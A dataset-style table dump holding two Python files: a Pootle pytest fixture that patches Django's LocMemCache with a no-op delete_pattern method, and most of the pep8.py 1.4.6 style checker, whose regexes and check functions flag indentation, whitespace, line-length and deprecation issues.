code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
@pytest.fixture(scope='session', autouse=True)
def delete_pattern():
    """Adds the no-op `delete_pattern()` method to `LocMemCache`."""
    from django.core.cache.backends.locmem import LocMemCache

    def _noop_delete_pattern(self, pattern):
        # Mirror the redis backend's API without touching any keys.
        return 0

    LocMemCache.delete_pattern = _noop_delete_pattern
| Avira/pootle | tests/fixtures/cache.py | Python | gpl-3.0 | 562 |
#!/usr/bin/env python
# pep8.py - Check Python source code formatting, according to PEP 8
# Copyright (C) 2006-2009 Johann C. Rocholl <johann@rocholl.net>
# Copyright (C) 2009-2013 Florent Xicluna <florent.xicluna@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
r"""
Check Python source code formatting, according to PEP 8:
http://www.python.org/dev/peps/pep-0008/
For usage and a list of options, try this:
$ python pep8.py -h
This program and its regression test suite live here:
http://github.com/jcrocholl/pep8
Groups of errors and warnings:
E errors
W warnings
100 indentation
200 whitespace
300 blank lines
400 imports
500 line length
600 deprecation
700 statements
900 syntax error
"""
__version__ = '1.4.6'
import os
import sys
import re
import time
import inspect
import keyword
import tokenize
from optparse import OptionParser
from fnmatch import fnmatch
try:
from configparser import RawConfigParser
from io import TextIOWrapper
except ImportError:
from ConfigParser import RawConfigParser
# Comma-separated path patterns that are skipped by default.
DEFAULT_EXCLUDE = '.svn,CVS,.bzr,.hg,.git,__pycache__'
# Checks disabled by default (see the list of error codes in the docstring).
DEFAULT_IGNORE = 'E123,E226,E24'
if sys.platform == 'win32':
    DEFAULT_CONFIG = os.path.expanduser(r'~\.pep8')
else:
    # Honour XDG_CONFIG_HOME when set, otherwise fall back to ~/.config.
    DEFAULT_CONFIG = os.path.join(os.getenv('XDG_CONFIG_HOME') or
                                  os.path.expanduser('~/.config'), 'pep8')
# Per-project configuration files, searched from the working directory up.
PROJECT_CONFIG = ('setup.cfg', 'tox.ini', '.pep8')
TESTSUITE_PATH = os.path.join(os.path.dirname(__file__), 'testsuite')
MAX_LINE_LENGTH = 79
# Output templates keyed by the --format option.
REPORT_FORMAT = {
    'default': '%(path)s:%(row)d:%(col)d: %(code)s %(text)s',
    'pylint': '%(path)s:%(row)d: [%(code)s] %(text)s',
}

# compile() flag: parse to an AST without executing the code.
PyCF_ONLY_AST = 1024
SINGLETONS = frozenset(['False', 'None', 'True'])
# 'print' is treated as a keyword so Python 2 sources check cleanly.
KEYWORDS = frozenset(keyword.kwlist + ['print']) - SINGLETONS
UNARY_OPERATORS = frozenset(['>>', '**', '*', '+', '-'])
ARITHMETIC_OP = frozenset(['**', '*', '/', '//', '+', '-'])
WS_OPTIONAL_OPERATORS = ARITHMETIC_OP.union(['^', '&', '|', '<<', '>>', '%'])
WS_NEEDED_OPERATORS = frozenset([
    '**=', '*=', '/=', '//=', '+=', '-=', '!=', '<>', '<', '>',
    '%=', '^=', '&=', '|=', '==', '<=', '>=', '<<=', '>>=', '='])
WHITESPACE = frozenset(' \t')
SKIP_TOKENS = frozenset([tokenize.COMMENT, tokenize.NL, tokenize.NEWLINE,
                         tokenize.INDENT, tokenize.DEDENT])
BENCHMARK_KEYS = ['directories', 'files', 'logical lines', 'physical lines']

INDENT_REGEX = re.compile(r'([ \t]*)')
RAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,')
RERAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,\s*\w+\s*,\s*\w+')
ERRORCODE_REGEX = re.compile(r'\b[A-Z]\d{3}\b')
DOCSTRING_REGEX = re.compile(r'u?r?["\']')
EXTRANEOUS_WHITESPACE_REGEX = re.compile(r'[[({] | []}),;:]')
# NOTE(review): the two-space alternative matches upstream pep8 1.4.6; the
# single space in this copy looks like whitespace-collapse corruption.
WHITESPACE_AFTER_COMMA_REGEX = re.compile(r'[,;:]\s*(?:  |\t)')
COMPARE_SINGLETON_REGEX = re.compile(r'([=!]=)\s*(None|False|True)')
COMPARE_TYPE_REGEX = re.compile(r'(?:[=!]=|is(?:\s+not)?)\s*type(?:s.\w+Type'
                                r'|\s*\(\s*([^)]*[^ )])\s*\))')
KEYWORD_REGEX = re.compile(r'(\s*)\b(?:%s)\b(\s*)' % r'|'.join(KEYWORDS))
OPERATOR_REGEX = re.compile(r'(?:[^,\s])(\s*)(?:[-+*/|!<=>%&^]+)(\s*)')
LAMBDA_REGEX = re.compile(r'\blambda\b')
HUNK_REGEX = re.compile(r'^@@ -\d+(?:,\d+)? \+(\d+)(?:,(\d+))? @@.*$')

# Work around Python < 2.6 behaviour, which does not generate NL after
# a comment which is on a line by itself.
COMMENT_WITH_NL = tokenize.generate_tokens(['#\n'].pop).send(None)[1] == '#\n'
##############################################################################
# Plugins (check functions) for physical lines
##############################################################################
def tabs_or_spaces(physical_line, indent_char):
    r"""
    Never mix tabs and spaces.

    The most popular way of indenting Python is with spaces only.  The
    second-most popular way is with tabs only.  Code indented with a mixture
    of tabs and spaces should be converted to using spaces exclusively.

    Okay: if a == 0:\n        a = 1\n        b = 1
    E101: if a == 0:\n        a = 1\n\tb = 1
    """
    indent = INDENT_REGEX.match(physical_line).group(1)
    # First indentation character that differs from the file's indent style.
    mismatch = next((pos for pos, char in enumerate(indent)
                     if char != indent_char), None)
    if mismatch is not None:
        return mismatch, "E101 indentation contains mixed spaces and tabs"
def tabs_obsolete(physical_line):
    r"""
    For new projects, spaces-only are strongly recommended over tabs.  Most
    editors have features that make this easy to do.

    Okay: if True:\n    return
    W191: if True:\n\treturn
    """
    indent = INDENT_REGEX.match(physical_line).group(1)
    tab_pos = indent.find('\t')
    if tab_pos >= 0:
        return tab_pos, "W191 indentation contains tabs"
def trailing_whitespace(physical_line):
    r"""
    JCR: Trailing whitespace is superfluous.

    The warning returned varies on whether the line itself is blank, for
    easier filtering for those who want to indent their blank lines.

    Okay: spam(1)\n#
    W291: spam(1) \n#
    W293: class Foo(object):\n    \n    bang = 12
    """
    # Drop the line terminator and any trailing form feed before checking.
    line = physical_line.rstrip('\n')    # chr(10), newline
    line = line.rstrip('\r')             # chr(13), carriage return
    line = line.rstrip('\x0c')           # chr(12), form feed, ^L
    stripped = line.rstrip(' \t\v')
    if stripped == line:
        return None
    if stripped:
        return len(stripped), "W291 trailing whitespace"
    return 0, "W293 blank line contains whitespace"
def trailing_blank_lines(physical_line, lines, line_number):
    r"""
    JCR: Trailing blank lines are superfluous.

    Okay: spam(1)
    W391: spam(1)\n
    """
    on_last_line = (line_number == len(lines))
    if on_last_line and not physical_line.rstrip():
        return 0, "W391 blank line at end of file"
def missing_newline(physical_line):
    """
    JCR: The last line should have a newline.

    Reports warning W292.
    """
    # A line that loses nothing on rstrip() has no trailing newline at all.
    if physical_line == physical_line.rstrip():
        return len(physical_line), "W292 no newline at end of file"
def maximum_line_length(physical_line, max_line_length):
    """
    Limit all lines to a maximum of 79 characters.

    There are still many devices around that are limited to 80 character
    lines; plus, limiting windows to 80 characters makes it possible to
    have several windows side-by-side.

    Reports error E501.
    """
    line = physical_line.rstrip()
    length = len(line)
    # Lines flagged "# noqa" are exempt.
    if length <= max_line_length or noqa(line):
        return None
    if hasattr(line, 'decode'):   # Python 2
        # Recount in code points so multi-byte characters are not penalized.
        try:
            length = len(line.decode('utf-8'))
        except UnicodeError:
            pass
    if length > max_line_length:
        return (max_line_length, "E501 line too long "
                "(%d > %d characters)" % (length, max_line_length))
##############################################################################
# Plugins (check functions) for logical lines
##############################################################################
def blank_lines(logical_line, blank_lines, indent_level, line_number,
                previous_logical, previous_indent_level):
    r"""
    Separate top-level function and class definitions with two blank lines.
    Method definitions inside a class are separated by a single blank line.

    Okay: def a():\n    pass\n\n\ndef b():\n    pass
    E301: class Foo:\n    b = 0\n    def bar():\n        pass
    E302: def a():\n    pass\n\ndef b(n):\n    pass
    E303: def a():\n    pass\n\n\n\ndef b(n):\n    pass
    E304: @decorator\n\ndef a():\n    pass
    """
    if line_number < 3 and not previous_logical:
        # Don't expect blank lines before the first line.
        return
    follows_decorator = previous_logical.startswith('@')
    if follows_decorator:
        if blank_lines:
            yield 0, "E304 blank lines found after function decorator"
    elif blank_lines > 2 or (indent_level and blank_lines == 2):
        yield 0, "E303 too many blank lines (%d)" % blank_lines
    elif logical_line.startswith(('def ', 'class ', '@')):
        if not indent_level:
            # Top level: exactly two blank lines are expected.
            if blank_lines != 2:
                yield 0, "E302 expected 2 blank lines, found %d" % blank_lines
        elif not (blank_lines or
                  previous_indent_level < indent_level or
                  DOCSTRING_REGEX.match(previous_logical)):
            yield 0, "E301 expected 1 blank line, found 0"
def extraneous_whitespace(logical_line):
    """
    Avoid extraneous whitespace in the following situations:

    - Immediately inside parentheses, brackets or braces.
    - Immediately before a comma, semicolon, or colon.

    Okay: spam(ham[1], {eggs: 2})
    E201: spam( ham[1], {eggs: 2})
    E202: spam(ham[1], {eggs: 2} )
    E203: if x == 4: print x, y; x, y = y , x
    """
    for match in EXTRANEOUS_WHITESPACE_REGEX.finditer(logical_line):
        text = match.group()
        char = text.strip()
        found = match.start()
        if text.endswith(' '):
            # Opening bracket followed by a space.
            yield found + 1, "E201 whitespace after '%s'" % char
        elif logical_line[found - 1] != ',':
            # Space before a closer or punctuation; commas are tolerated.
            code = 'E202' if char in '}])' else 'E203'
            yield found, "%s whitespace before '%s'" % (code, char)
def whitespace_around_keywords(logical_line):
    r"""
    Avoid extraneous whitespace around keywords.

    Okay: True and False
    E271: True and  False
    E272: True  and False
    E273: True and\tFalse
    E274: True\tand False
    """
    checks = (
        (1, "E274 tab before keyword", "E272 multiple spaces before keyword"),
        (2, "E273 tab after keyword", "E271 multiple spaces after keyword"),
    )
    for match in KEYWORD_REGEX.finditer(logical_line):
        # Group 1 is the whitespace before the keyword, group 2 after.
        for group, tab_message, spaces_message in checks:
            gap = match.group(group)
            if '\t' in gap:
                yield match.start(group), tab_message
            elif len(gap) > 1:
                yield match.start(group), spaces_message
def missing_whitespace(logical_line):
    """
    JCR: Each comma, semicolon or colon should be followed by whitespace.

    Okay: [a, b]
    Okay: (3,)
    Okay: a[1:4]
    E231: ['a','b']
    E231: foo(bar,baz)
    E231: [{'a':'b'}]
    """
    line = logical_line
    for index, char in enumerate(line[:-1]):
        if char not in ',;:':
            continue
        next_char = line[index + 1]
        if next_char in WHITESPACE:
            continue
        if char == ':':
            before = line[:index]
            if (before.count('[') > before.count(']') and
                    before.rfind('{') < before.rfind('[')):
                continue    # Slice syntax, no space required
        if char == ',' and next_char == ')':
            continue    # Allow tuple with only one element: (3,)
        yield index, "E231 missing whitespace after '%s'" % char
def indentation(logical_line, previous_logical, indent_char,
                indent_level, previous_indent_level):
    r"""
    Use 4 spaces per indentation level.

    Okay: a = 1
    Okay: if a == 0:\n    a = 1
    E111: a = 1 (indented by an amount that is not a multiple of four)
    E112: for item in items:\npass
    E113: a = 1\n    b = 2
    """
    if indent_char == ' ' and indent_level % 4 != 0:
        yield 0, "E111 indentation is not a multiple of four"
    # A logical line ending in ':' opens a block, so more indent is expected.
    indent_expect = previous_logical.endswith(':')
    if indent_expect:
        if indent_level <= previous_indent_level:
            yield 0, "E112 expected an indented block"
    elif indent_level > previous_indent_level:
        yield 0, "E113 unexpected indentation"
def continued_indentation(logical_line, tokens, indent_level, hang_closing,
                          noqa, verbose):
    r"""
    Continuation lines should align wrapped elements either vertically using
    Python's implicit line joining inside parentheses, brackets and braces,
    or using a hanging indent.

    When using a hanging indent the following considerations should be
    applied:
    - there should be no arguments on the first line, and
    - further indentation should be used to clearly distinguish itself as a
      continuation line.

    Okay: a = (\n)
    E123: a = (\n    )
    Okay: a = (\n    42)
    E121: a = (\n   42)
    E122: a = (\n42)
    E123: a = (\n    42\n    )
    E124: a = (24,\n     42\n)
    E125: if (a or\n    b):\n    pass
    E126: a = (\n        42)
    E127: a = (24,\n      42)
    E128: a = (24,\n    42)
    """
    first_row = tokens[0][2][0]
    nrows = 1 + tokens[-1][2][0] - first_row
    if noqa or nrows == 1:
        # Single physical line (or suppressed): nothing to check.
        return

    # indent_next tells us whether the next block is indented; assuming
    # that it is indented by 4 spaces, then we should not allow 4-space
    # indents on the final continuation line; in turn, some other
    # indents are allowed to have an extra 4 spaces.
    indent_next = logical_line.endswith(':')

    row = depth = 0
    # remember how many brackets were opened on each line
    parens = [0] * nrows
    # relative indents of physical lines
    rel_indent = [0] * nrows
    # visual indents
    indent_chances = {}
    last_indent = tokens[0][2]
    # indent[d] is the column enforced for visual indent at bracket depth d
    # (0 means "not yet established").
    indent = [last_indent[1]]
    if verbose >= 3:
        print(">>> " + tokens[0][4].rstrip())

    for token_type, text, start, end, line in tokens:

        newline = row < start[0] - first_row
        if newline:
            row = start[0] - first_row
            # NOTE: last_token_multiline is only read here after the first
            # row change, by which point the loop tail has assigned it.
            newline = (not last_token_multiline and
                       token_type not in (tokenize.NL, tokenize.NEWLINE))

        if newline:
            # this is the beginning of a continuation line.
            last_indent = start
            if verbose >= 3:
                print("... " + line.rstrip())

            # record the initial indent.
            rel_indent[row] = expand_indent(line) - indent_level

            if depth:
                # a bracket expression in a continuation line.
                # find the line that it was opened on
                for open_row in range(row - 1, -1, -1):
                    if parens[open_row]:
                        break
            else:
                # an unbracketed continuation line (ie, backslash)
                open_row = 0
            # hang: extra indentation relative to the opening line.
            hang = rel_indent[row] - rel_indent[open_row]
            close_bracket = (token_type == tokenize.OP and text in ']})')
            visual_indent = (not close_bracket and hang > 0 and
                             indent_chances.get(start[1]))

            if close_bracket and indent[depth]:
                # closing bracket for visual indent
                if start[1] != indent[depth]:
                    yield (start, "E124 closing bracket does not match "
                           "visual indentation")
            elif close_bracket and not hang:
                # closing bracket matches indentation of opening bracket's line
                if hang_closing:
                    yield start, "E133 closing bracket is missing indentation"
            elif visual_indent is True:
                # visual indent is verified
                if not indent[depth]:
                    indent[depth] = start[1]
            elif visual_indent in (text, str):
                # ignore token lined up with matching one from a previous line
                pass
            elif indent[depth] and start[1] < indent[depth]:
                # visual indent is broken
                yield (start, "E128 continuation line "
                       "under-indented for visual indent")
            elif hang == 4 or (indent_next and rel_indent[row] == 8):
                # hanging indent is verified
                if close_bracket and not hang_closing:
                    yield (start, "E123 closing bracket does not match "
                           "indentation of opening bracket's line")
            else:
                # indent is broken
                if hang <= 0:
                    error = "E122", "missing indentation or outdented"
                elif indent[depth]:
                    error = "E127", "over-indented for visual indent"
                elif hang % 4:
                    error = "E121", "indentation is not a multiple of four"
                else:
                    error = "E126", "over-indented for hanging indent"
                yield start, "%s continuation line %s" % error

        # look for visual indenting
        if (parens[row] and token_type not in (tokenize.NL, tokenize.COMMENT)
                and not indent[depth]):
            indent[depth] = start[1]
            indent_chances[start[1]] = True
            if verbose >= 4:
                print("bracket depth %s indent to %s" % (depth, start[1]))
        # deal with implicit string concatenation
        elif (token_type in (tokenize.STRING, tokenize.COMMENT) or
              text in ('u', 'ur', 'b', 'br')):
            indent_chances[start[1]] = str
        # special case for the "if" statement because len("if (") == 4
        elif not indent_chances and not row and not depth and text == 'if':
            indent_chances[end[1] + 1] = True

        # keep track of bracket depth
        if token_type == tokenize.OP:
            if text in '([{':
                depth += 1
                indent.append(0)
                parens[row] += 1
                if verbose >= 4:
                    print("bracket depth %s seen, col %s, visual min = %s" %
                          (depth, start[1], indent[depth]))
            elif text in ')]}' and depth > 0:
                # parent indents should not be more than this one
                prev_indent = indent.pop() or last_indent[1]
                for d in range(depth):
                    if indent[d] > prev_indent:
                        indent[d] = 0
                for ind in list(indent_chances):
                    if ind >= prev_indent:
                        del indent_chances[ind]
                depth -= 1
                if depth:
                    indent_chances[indent[depth]] = True
                # decrement the bracket count of the row it was opened on
                for idx in range(row, -1, -1):
                    if parens[idx]:
                        parens[idx] -= 1
                        rel_indent[row] = rel_indent[idx]
                        break
            assert len(indent) == depth + 1
            if start[1] not in indent_chances:
                # allow to line up tokens
                indent_chances[start[1]] = text

        last_token_multiline = (start[0] != end[0])

    if indent_next and expand_indent(line) == indent_level + 4:
        yield (last_indent, "E125 continuation line does not distinguish "
               "itself from next logical line")
def whitespace_before_parameters(logical_line, tokens):
    """
    Avoid extraneous whitespace in the following situations:

    - Immediately before the open parenthesis that starts the argument
      list of a function call.
    - Immediately before the open parenthesis that starts an indexing or
      slicing.

    Okay: spam(1)
    E211: spam (1)
    Okay: dict['key'] = list[index]
    E211: dict ['key'] = list[index]
    E211: dict['key'] = list [index]
    """
    prev_type, prev_text, __, prev_end, __ = tokens[0]
    for index, token in enumerate(tokens):
        if not index:
            continue    # the first token has no predecessor
        token_type, text, start, end, __ = token
        opens_bracket = (token_type == tokenize.OP and text in '([')
        if (opens_bracket and
                start != prev_end and
                (prev_type == tokenize.NAME or prev_text in '}])') and
                # Syntax "class A (B):" is allowed, but avoid it
                (index < 2 or tokens[index - 2][1] != 'class') and
                # Allow "return (a.foo for a in range(5))"
                not keyword.iskeyword(prev_text)):
            yield prev_end, "E211 whitespace before '%s'" % text
        prev_type, prev_text, prev_end = token_type, text, end
def whitespace_around_operator(logical_line):
    r"""
    Avoid extraneous whitespace in the following situations:

    - More than one space around an assignment (or other) operator to
      align it with another.

    Okay: a = 12 + 3
    E221: a = 4  + 5
    E222: a = 4 +  5
    E223: a = 4\t+ 5
    E224: a = 4 +\t5
    """
    checks = (
        (1, "E223 tab before operator", "E221 multiple spaces before operator"),
        (2, "E224 tab after operator", "E222 multiple spaces after operator"),
    )
    for match in OPERATOR_REGEX.finditer(logical_line):
        # Group 1 is the whitespace before the operator, group 2 after.
        for group, tab_message, spaces_message in checks:
            gap = match.group(group)
            if '\t' in gap:
                yield match.start(group), tab_message
            elif len(gap) > 1:
                yield match.start(group), spaces_message
def missing_whitespace_around_operator(logical_line, tokens):
    r"""
    - Always surround these binary operators with a single space on
      either side: assignment (=), augmented assignment (+=, -= etc.),
      comparisons (==, <, >, !=, <>, <=, >=, in, not in, is, is not),
      Booleans (and, or, not).
    - Use spaces around arithmetic operators.

    Okay: i = i + 1
    Okay: submitted += 1
    Okay: x = x * 2 - 1
    Okay: foo(bar, key='word', *args, **kwargs)
    E225: i=i+1
    E225: submitted +=1
    E226: c = (a+b) * (a-b)
    E227: c = a|b
    E228: msg = fmt%(errno, errmsg)
    """
    # need_space is a tri-state accumulator:
    #   False          -> nothing pending
    #   True           -> space is mandatory around the previous operator
    #   (pos, bool)    -> space optional; bool records whether an opening
    #                     space was seen, so the trailing side must match.
    parens = 0
    need_space = False
    prev_type = tokenize.OP
    prev_text = prev_end = None
    for token_type, text, start, end, line in tokens:
        if token_type in (tokenize.NL, tokenize.NEWLINE, tokenize.ERRORTOKEN):
            # ERRORTOKEN is triggered by backticks in Python 3
            continue
        if text in ('(', 'lambda'):
            # 'lambda' opens a parameter list, like '(' (closed at ':').
            parens += 1
        elif text == ')':
            parens -= 1
        if need_space:
            if start != prev_end:
                # Found a (probably) needed space
                if need_space is not True and not need_space[1]:
                    yield (need_space[0],
                           "E225 missing whitespace around operator")
                need_space = False
            elif text == '>' and prev_text in ('<', '-'):
                # Tolerate the "<>" operator, even if running Python 3
                # Deal with Python 3's annotated return value "->"
                pass
            else:
                if need_space is True or need_space[1]:
                    # A needed trailing space was not found
                    yield prev_end, "E225 missing whitespace around operator"
                else:
                    # Optional-space operator written tight: pick the code
                    # by operator class.
                    code, optype = 'E226', 'arithmetic'
                    if prev_text == '%':
                        code, optype = 'E228', 'modulo'
                    elif prev_text not in ARITHMETIC_OP:
                        code, optype = 'E227', 'bitwise or shift'
                    yield (need_space[0], "%s missing whitespace "
                           "around %s operator" % (code, optype))
                need_space = False
        elif token_type == tokenize.OP and prev_end is not None:
            if text == '=' and parens:
                # Allow keyword args or defaults: foo(bar=None).
                pass
            elif text in WS_NEEDED_OPERATORS:
                need_space = True
            elif text in UNARY_OPERATORS:
                # Check if the operator is being used as a binary operator
                # Allow unary operators: -123, -x, +1.
                # Allow argument unpacking: foo(*args, **kwargs).
                if prev_type == tokenize.OP:
                    binary_usage = (prev_text in '}])')
                elif prev_type == tokenize.NAME:
                    binary_usage = (prev_text not in KEYWORDS)
                else:
                    binary_usage = (prev_type not in SKIP_TOKENS)
                if binary_usage:
                    need_space = None
            elif text in WS_OPTIONAL_OPERATORS:
                need_space = None

            if need_space is None:
                # Surrounding space is optional, but ensure that
                # trailing space matches opening space
                need_space = (prev_end, start != prev_end)
            elif need_space and start == prev_end:
                # A needed opening space was not found
                yield prev_end, "E225 missing whitespace around operator"
                need_space = False
        prev_type = token_type
        prev_text = text
        prev_end = end
def whitespace_around_comma(logical_line):
    r"""
    Avoid extraneous whitespace after a comma (or a colon or semicolon).

    Note: these checks are disabled by default

    Okay: a = (1, 2)
    E241: a = (1,  2)
    E242: a = (1,\t2)
    """
    for m in WHITESPACE_AFTER_COMMA_REGEX.finditer(logical_line):
        found = m.start() + 1
        kind = 'E242 tab' if '\t' in m.group() else 'E241 multiple spaces'
        yield found, "%s after '%s'" % (kind, m.group()[0])
def whitespace_around_named_parameter_equals(logical_line, tokens):
    """
    Don't use spaces around the '=' sign when used to indicate a
    keyword argument or a default parameter value.

    Okay: def complex(real, imag=0.0):
    Okay: return magic(r=real, i=imag)
    E251: def complex(real, imag = 0.0):
    E251: return magic(r = real, i = imag)
    """
    message = "E251 unexpected spaces around keyword / parameter equals"
    depth = 0
    check_next = False
    prev_end = None
    for token_type, text, start, end, line in tokens:
        if check_next:
            # Verify there is no gap after a parenthesized '='.
            check_next = False
            if start != prev_end:
                yield prev_end, message
        elif token_type == tokenize.OP:
            if text == '(':
                depth += 1
            elif text == ')':
                depth -= 1
            elif text == '=' and depth:
                check_next = True
                if start != prev_end:
                    yield prev_end, message
        prev_end = end
def whitespace_before_inline_comment(logical_line, tokens):
    """
    Separate inline comments by at least two spaces.

    An inline comment is a comment on the same line as a statement.  Inline
    comments should be separated by at least two spaces from the statement.
    They should start with a # and a single space.

    Okay: x = x + 1  # Increment x
    E261: x = x + 1 # Increment x
    E262: x = x + 1  #Increment x
    E262: x = x + 1  #  Increment x
    """
    prev_end = (0, 0)
    for token_type, text, start, end, line in tokens:
        if token_type != tokenize.COMMENT:
            if token_type != tokenize.NL:
                prev_end = end
            continue
        if not line[:start[1]].strip():
            # Comment on its own line: not an inline comment.
            continue
        on_same_row = (prev_end[0] == start[0])
        if on_same_row and start[1] < prev_end[1] + 2:
            yield (prev_end,
                   "E261 at least two spaces before inline comment")
        symbol, _, comment = text.partition(' ')
        if symbol not in ('#', '#:') or comment[:1].isspace():
            yield start, "E262 inline comment should start with '# '"
def imports_on_separate_lines(logical_line):
    r"""
    Imports should usually be on separate lines.

    Okay: import os\nimport sys
    E401: import sys, os
    Okay: from subprocess import Popen, PIPE
    Okay: import foo.bar.yourclass
    """
    if not logical_line.startswith('import '):
        return
    comma = logical_line.find(',')
    # A semicolon before the comma means the comma belongs to a later
    # statement, not to this import.
    if comma > -1 and ';' not in logical_line[:comma]:
        yield comma, "E401 multiple imports on one line"
def compound_statements(logical_line):
    r"""
    Compound statements (multiple statements on the same line) are
    generally discouraged.

    Okay: if foo == 'blah':\n    do_blah_thing()
    E701: if foo == 'blah': do_blah_thing()
    E701: try: something()
    E702: do_one(); do_two(); do_three()
    E703: do_four();  # useless semicolon
    """
    line = logical_line
    last_char = len(line) - 1

    pos = line.find(':')
    while -1 < pos < last_char:
        before = line[:pos]
        # Skip colons that live inside an open brace/bracket/paren
        # ({'a': 1} dicts, [1:2] slices, Python 3 annotations) or a lambda.
        inside_brackets = (before.count('{') > before.count('}') or
                           before.count('[') > before.count(']') or
                           before.count('(') > before.count(')'))
        if not inside_brackets and not LAMBDA_REGEX.search(before):
            yield pos, "E701 multiple statements on one line (colon)"
        pos = line.find(':', pos + 1)

    pos = line.find(';')
    while pos > -1:
        if pos < last_char:
            yield pos, "E702 multiple statements on one line (semicolon)"
        else:
            yield pos, "E703 statement ends with a semicolon"
        pos = line.find(';', pos + 1)
def explicit_line_join(logical_line, tokens):
    r"""
    Avoid explicit line join between brackets.

    The preferred way of wrapping long lines is by using Python's implied
    line continuation inside parentheses, brackets and braces.  These should
    be used in preference to using a backslash for line continuation.

    E502: aaa = [123, \\n       123]
    Okay: aaa = [123,\n       123]
    Okay: aaa = "bbb " \\n    "ccc"
    """
    # 'backslash' holds the (row, col) of a trailing backslash on the
    # previous physical line, or None.  It is always assigned before the
    # first read: parens is 0 until a bracket is seen, and the first token
    # triggers the end[0] != prev_end branch below.
    prev_start = prev_end = parens = 0
    for token_type, text, start, end, line in tokens:
        if start[0] != prev_start and parens and backslash:
            # Backslash continuation while inside brackets is redundant.
            yield backslash, "E502 the backslash is redundant between brackets"
        if end[0] != prev_end:
            # Token ends on a new physical line: remember a trailing
            # backslash, if any, for the check above.
            if line.rstrip('\r\n').endswith('\\'):
                backslash = (end[0], len(line.splitlines()[-1]) - 1)
            else:
                backslash = None
            prev_start = prev_end = end[0]
        else:
            prev_start = start[0]
        if token_type == tokenize.OP:
            # Track bracket nesting depth.
            if text in '([{':
                parens += 1
            elif text in ')]}':
                parens -= 1
def comparison_to_singleton(logical_line, noqa):
    """
    Comparisons to singletons like None should always be done
    with "is" or "is not", never the equality operators.

    Okay: if arg is not None:
    E711: if arg != None:
    E712: if arg == True:

    Also, beware of writing if x when you really mean if x is not None --
    e.g. when testing whether a variable or argument that defaults to None
    was set to some other value.
    """
    match = None if noqa else COMPARE_SINGLETON_REGEX.search(logical_line)
    if not match:
        return
    same = (match.group(1) == '==')
    singleton = match.group(2)
    msg = "'if cond is %s:'" % (('' if same else 'not ') + singleton)
    if singleton == 'None':
        code = 'E711'
    else:
        code = 'E712'
        nonzero = ((singleton == 'True' and same) or
                   (singleton == 'False' and not same))
        msg += " or 'if %scond:'" % ('' if nonzero else 'not ')
    yield match.start(1), ("%s comparison to %s should be %s" %
                           (code, singleton, msg))
def comparison_type(logical_line):
    """
    Object type comparisons should always use isinstance() instead of
    comparing types directly.

    Okay: if isinstance(obj, int):
    E721: if type(obj) is type(1):
    Okay: if isinstance(obj, basestring):
    Okay: if type(a1) is type(b1):
    """
    match = COMPARE_TYPE_REGEX.search(logical_line)
    if not match:
        return
    inst = match.group(1)
    if inst and isidentifier(inst) and inst not in SINGLETONS:
        # Allow comparison for types which are not obvious
        return
    yield match.start(), "E721 do not compare types, use 'isinstance()'"
def python_3000_has_key(logical_line):
    r"""
    The {}.has_key() method is removed in the Python 3.
    Use the 'in' operation instead.

    Okay: if "alph" in d:\n    print d["alph"]
    W601: assert d.has_key('alph')
    """
    pos = logical_line.find('.has_key(')
    if pos != -1:
        yield pos, "W601 .has_key() is deprecated, use 'in'"
def python_3000_raise_comma(logical_line):
    """
    When raising an exception, use "raise ValueError('message')"
    instead of the older form "raise ValueError, 'message'".
    The older form is removed in Python 3.

    Okay: raise DummyError("Message")
    W602: raise DummyError, "Message"
    """
    match = RAISE_COMMA_REGEX.match(logical_line)
    if match is None:
        return
    # The three-argument re-raise form is handled by a separate check.
    if not RERAISE_COMMA_REGEX.match(logical_line):
        yield match.end() - 1, "W602 deprecated form of raising exception"
def python_3000_not_equal(logical_line):
    """
    != can also be written <>, but this is an obsolete usage kept for
    backwards compatibility only.  The older syntax is removed in Python 3.

    Okay: if a != 'no':
    W603: if a <> 'no':
    """
    pos = logical_line.find('<>')
    if pos != -1:
        yield pos, "W603 '<>' is deprecated, use '!='"
def python_3000_backticks(logical_line):
    """
    Backticks are removed in Python 3.
    Use repr() instead.

    Okay: val = repr(1 + 2)
    W604: val = `1 + 2`
    """
    pos = logical_line.find('`')
    if pos != -1:
        yield pos, "W604 backticks are deprecated, use 'repr()'"
##############################################################################
# Helper functions
##############################################################################
# Select Python 2 or Python 3 implementations of the I/O helpers.
# On Python 2, '' == ''.encode() is true (both are str); on Python 3 the
# comparison of str with bytes is false.
if '' == ''.encode():
    # Python 2: implicit encoding.
    def readlines(filename):
        f = open(filename)
        try:
            return f.readlines()
        finally:
            f.close()
    isidentifier = re.compile(r'[a-zA-Z_]\w*').match
    stdin_get_value = sys.stdin.read
else:
    # Python 3
    def readlines(filename):
        # Open in binary first so the PEP 263 coding cookie can be honoured.
        f = open(filename, 'rb')
        try:
            coding, lines = tokenize.detect_encoding(f.readline)
            f = TextIOWrapper(f, coding, line_buffering=True)
            # 'lines' holds the bytes already consumed while sniffing.
            return [l.decode(coding) for l in lines] + f.readlines()
        except (LookupError, SyntaxError, UnicodeError):
            f.close()
            # Fall back if files are improperly declared
            f = open(filename, encoding='latin-1')
            return f.readlines()
